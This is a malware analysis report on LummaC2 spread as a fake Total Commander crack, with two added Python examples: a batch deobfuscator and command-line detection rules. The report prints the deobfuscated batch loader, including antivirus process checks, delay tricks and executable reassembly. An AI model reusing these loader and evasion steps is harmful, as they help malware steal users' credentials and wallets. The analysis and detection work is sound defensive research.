LummaC2 Malware Distributed Disguised as Total Commander Crack
AhnLab SEcurity intelligence Center (ASEC) has discovered the LummaC2 malware being distributed disguised as the Total Commander tool. Total Commander is a file manager for Windows that supports various file formats. It offers convenient file management features such as copy and move operations, advanced search using strings within files, folder synchronization, and FTP/SFTP support. The tool offers a one-month free trial, after which users must purchase a license for the full version.

Figure 1. Total Commander
Searching “Total Commander Crack” on Google displays a post about downloading the cracked version. Clicking on the post leads to a Google Colab drive page that prompts the user to click a download button. Following the flow shown in Figures 2 to 5, the user passes through several page transitions before finally arriving at the location where the threat actor uploaded the file. These page transitions do not happen through automatic redirection; the user has to read each post and click its link in order to download the malware disguised as a crack. This means the attack specifically targeted users who intended to download the cracked software. The attack’s meticulous nature can be seen in the page disguised as a Reddit thread (Figure 4): both the post requesting a Total Commander crack and the comments replying to it include hyperlinks.

Figure 2. Search result of “Total Commander Crack” on Google

Figure 3. Download page 1 – Google Colab drive

Figure 4. Page 2 of the Download Page – Disguised as a Reddit Post

Figure 5. Download page 3 – Final download page
The ZIP file downloaded through the link is double-compressed: it contains a RAR file, and that RAR file is password-protected.

Figure 6. Compressed file being downloaded and its contents
The user is prompted to install the “installer_1.05_38.2.exe” file, which infects the system with LummaC2 when executed. This sample is a heavily obfuscated LummaC2 wrapped in multiple layers of NSIS and AutoIt scripts. When executed, the NSIS script runs first. It uses the ExecShell command to execute a batch script via cmd. The highlighted part in Figure 7 shows a variable inserted into the middle of a string; once the variable’s value is substituted at runtime, the following command is executed.
ExecShell open cmd "/c copy Nv Nv.cmd & Nv.cmd"

Figure 7. NSIS script
The batch script is obfuscated as shown below: characters are stored in variables, which are then inserted into the middle of commands, and meaningless strings are added inside the commands to make the script harder to read.

Figure 8. Nv.cmd (Batch script)
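A small resolver for this style of obfuscation, written here as an added example (it is not ASEC's tooling and the SAMPLE script it runs on is constructed, not the real Nv.cmd). It inlines variables that are assigned exactly once on a line of their own, expands references to never-assigned variables to nothing (which is what cmd does inside a batch file, so junk like %Nothing% disappears), and deliberately leaves variables that are reassigned later, for example inside an "if not errorlevel 1" branch, as %NAME% so the analyst can see they depend on runtime checks:

```python
"""Resolve batch-script obfuscation that hides commands behind %VAR% pieces.
Added example, not ASEC's tooling; SAMPLE below is a constructed script."""
import re

# `set NAME=`, `set "NAME=`, `set /a NAME=` anywhere in a line (only used to count assignments)
SET_ANY = re.compile(r'\bset\s+(?:/a\s+)?"?([^=\s"/]+)=', re.IGNORECASE)
# a line that is nothing but one plain assignment, quoted or unquoted
SET_WHOLE_LINE = re.compile(r'^\s*set\s+(?:"([^=\s"]+)=(.*)"|([^=\s"/]+)=(.*))\s*$', re.IGNORECASE)
# %NAME% reference; %% (a literal percent in a batch file) never matches
VAR_REF = re.compile(r"%([^%\s]+)%")
MAX_PASSES = 10  # guard against a constant that references itself


def strip_carets(text: str) -> str:
    """Drop cmd's ^ escape characters outside double quotes (^^ becomes ^)."""
    out, in_quotes, i = [], False, 0
    while i < len(text):
        ch = text[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(text):
            out.append(text[i + 1])  # keep the escaped character itself
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def deobfuscate(script: str) -> list[str]:
    """Inline single-assignment constants, expand undefined variables to nothing,
    and keep runtime-dependent variables (assigned more than once) as %NAME%."""
    lines = [ln.rstrip() for ln in script.splitlines() if ln.strip()]

    assign_count: dict[str, int] = {}
    for ln in lines:
        for m in SET_ANY.finditer(ln):
            name = m.group(1).lower()
            assign_count[name] = assign_count.get(name, 0) + 1

    consts: dict[str, str] = {}
    for ln in lines:
        m = SET_WHOLE_LINE.match(ln)
        if not m:
            continue
        name = (m.group(1) or m.group(3)).lower()
        if assign_count.get(name) == 1:
            consts[name] = m.group(2) if m.group(1) else m.group(4)

    def expand(text: str) -> str:
        def sub(m: re.Match) -> str:
            name = m.group(1).lower()
            if name in consts:
                return consts[name]
            if name in assign_count:
                return m.group(0)      # set conditionally: leave it for the reader
            return ""                  # never assigned: cmd expands it to nothing
        for _ in range(MAX_PASSES):    # constants may be built from other constants
            new = VAR_REF.sub(sub, text)
            if new == text:
                break
            text = new
        return text

    result = []
    for ln in lines:
        m = SET_WHOLE_LINE.match(ln)
        if m and (m.group(1) or m.group(3)).lower() in consts:
            continue                   # pure obfuscation material, already inlined
        result.append(strip_carets(expand(ln)))  # cmd expands %VAR% before handling ^
    return result


# Constructed sample in the same style as Nv.cmd (not the real script).
SAMPLE = r'''Set Kq=t
Set "Mn=as"
Set Px=kl
Set Zr=%Mn%%Px%
Set Olym=Olympic.com
%Kq%%Zr%%Nothing%ist | findstr /I "opssvc wrsa" & if not errorlevel 1 pi%Gap%ng -n 194 127.0.0.1
%Kq%asklist | findstr "AvastUI" & if not errorlevel 1 Set Olym=AutoIt3.exe
c^m^d /c md Fires
start Fires\%Olym%
'''

if __name__ == "__main__":
    for line in deobfuscate(SAMPLE):
        print(line)
```

The conditional reassignment of Olym is the edge case worth keeping in mind: a naive resolver that substitutes the first value everywhere would report the runner as Olympic.com and hide the AutoIt3.exe branch that is taken when a security product is running.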
The deobfuscated script is shown below; it is relatively short.
Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.com
Set RRddJNCtGgRY=
Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5
tasklist | findstr /I "opssvc wrsa" & if not errorlevel 1 ping -n 194 127.0.0.1
Set /a Fires=363926
tasklist | findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" & if not errorlevel 1 Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=AutoIt3.exe & Set RRddJNCtGgRY=.a3x & Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=300
cmd /c md Fires
extrac32 /Y /E Schools
<nul set /p ="MZ" > Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
findstr /V "LIL" Cir >> Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cmd /c copy /b Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constitutes + Knives + Momentum + Stuff + Keywords + Infections Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cd Fires
cmd /c copy /b ..\Hebrew + ..\Fla + ..\Mtv + ..\Novel + ..\Suffer + ..\Update + ..\Msn NRRddJNCtGgRY
start VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY
cd ..
choice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz
The analysis shows that a legitimate AutoIt executable (the runner) is used to execute a compiled AutoIt (.a3x) script. The cmd file that NSIS runs on initial execution is a single file, but the .a3x script and the AutoIt runner that executes it are split across multiple files. As the script above shows, the runner is rebuilt by writing an "MZ" header, appending the contents of Cir with the junk lines containing "LIL" filtered out, and concatenating further chunks with copy /b; the .a3x script is concatenated from another set of chunks in the same way. Refer to Figure 9 below to see how the files are divided.

Figure 9. Divided binary file
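The reassembly steps leave characteristic traces in process command lines, which a defender can score from process-creation telemetry. The following is an added example, not ASEC's detection content: the rule names, weights, regexes and SAMPLE_EVENTS are all constructed here, with the patterns taken from the deobfuscated script above (AV process discovery via tasklist | findstr, a long ping to 127.0.0.1 as a sleep, writing "MZ" with set /p, filtering with findstr /V, multi-part copy /b joins, extrac32, choice as a timer, and the copy-to-.cmd-and-run launcher from the NSIS script).

```python
"""Score process command lines for the staged batch-loader tradecraft in Nv.cmd.
Added example; rule names, weights and SAMPLE_EVENTS are constructed, not ASEC's."""
import re

# (name, weight, pattern): high-weight rules are the ones with few benign uses.
RULES = [
    ("extensionless_to_cmd_and_run", 2, r"\bcopy\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd\b"),
    ("av_process_discovery", 2,
     r"\btasklist\b.*\|\s*findstr\b.*\b(?:opssvc|wrsa|AvastUI|AVGUI|bdservicehost|nsWscSvc|ekrn|SophosHealth)\b"),
    ("mz_header_via_set_p", 2, r'<nul\s+set\s+/p\s*=\s*"?MZ"?\s*>'),
    ("copy_b_multipart_join", 2, r"\bcopy\s+/b\b(?:[^+&|]*\+){3,}"),  # three or more '+' parts
    ("ping_loopback_sleep", 1, r"\bping\s+-n\s+(?:[3-9]\d|\d{3,})\s+127\.0\.0\.1\b"),  # -n >= 30
    ("choice_timeout_sleep", 1, r"\bchoice\s+/d\s+\w\s+/t\s+\S+"),
    ("extrac32_expand", 1, r"\bextrac32(?:\.exe)?\b.*\s/E(?:\s|$)"),
    ("findstr_strip_junk_lines", 1, r"\bfindstr\s+/V\b.*>>"),
    ("autoit_a3x_runner", 1, r"\bAutoIt3\.exe\b.*\.a3x\b"),
]
COMPILED = [(name, weight, re.compile(pat, re.IGNORECASE)) for name, weight, pat in RULES]
THRESHOLD = 2  # one high-weight hit, or two low-weight hits, flags the event


def match_indicators(cmdline: str) -> list[str]:
    """Names of all rules that fire on one command line, in RULES order."""
    return [name for name, _, rx in COMPILED if rx.search(cmdline)]


def score(hits: list[str]) -> int:
    weights = {name: weight for name, weight, _ in COMPILED}
    return sum(weights[h] for h in hits)


def triage(events: list[dict], threshold: int = THRESHOLD) -> list[tuple[str, list[str]]]:
    """Return (event id, fired rules) for every event whose score reaches the threshold."""
    flagged = []
    for ev in events:
        hits = match_indicators(ev["cmdline"])
        if score(hits) >= threshold:
            flagged.append((ev["id"], hits))
    return flagged


# Constructed process-creation records: four modelled on the script above, three benign.
SAMPLE_EVENTS = [
    {"id": "e1", "cmdline": r"cmd /c copy Nv Nv.cmd & Nv.cmd"},
    {"id": "e2", "cmdline": r'cmd /c tasklist | findstr /I "opssvc wrsa" & if not errorlevel 1 ping -n 194 127.0.0.1'},
    {"id": "e3", "cmdline": r'cmd /c <nul set /p ="MZ" > Fires\Olympic.com & findstr /V "LIL" Cir >> Fires\Olympic.com'},
    {"id": "e4", "cmdline": r"cmd /c copy /b Fires\Olympic.com + Religion + Consisting + Stuart + Police Fires\Olympic.com"},
    {"id": "e5", "cmdline": r"copy /b part1.bin + part2.bin whole.bin"},   # ordinary two-part join
    {"id": "e6", "cmdline": r"ping -n 4 127.0.0.1"},                        # ordinary short ping
    {"id": "e7", "cmdline": r"extrac32 /Y /E drivers.cab"},                 # legitimate CAB extraction
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits)
```

Note which rules carry the detection: the file-name rule (AutoIt3.exe with a .a3x argument) only fires in the branch taken when a security product is present, because the other branch names the runner Olympic.com and gives the script no extension. The behavioural rules (an "MZ" header written with set /p, a PE assembled from many copy /b parts, tasklist output grepped for security-product names) do not depend on those decoy names and are the ones to keep.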
The LummaC2 malware that is ultimately executed is stored encrypted within the .a3x file, as shown in Figure 10. It is decrypted at run time and loaded into memory. Both the encrypted malware binary and the shellcode that decompresses and loads it are contained in the AutoIt script. Wrapping malware in an AutoIt script in this way is a technique commonly used by threat actors. For more information on this technique, please refer to the following posts: [1][2]

Figure 10. Script decompiled from the .a3x file
LummaC2 is an information-stealing malware that has been actively distributed since early 2023. It is mainly disguised as illegal programs such as cracks and serials. When a system is infected with LummaC2, sensitive information such as browser-stored account credentials, email credentials, cryptocurrency wallet credentials, and auto-login program credentials is sent to the threat actor’s C&C server. The stolen information may be traded on the dark web or used in secondary attacks, causing additional harm. There have been continuous reports of data breaches where the theft of information from a personal PC led to an attack on the corporate system. For more information on LummaC2, please refer to the following posts: [3], [4], [5], [6], and [7].
It is recommended to download software only from official distribution sites. Extra caution is advised when using software from unknown sources.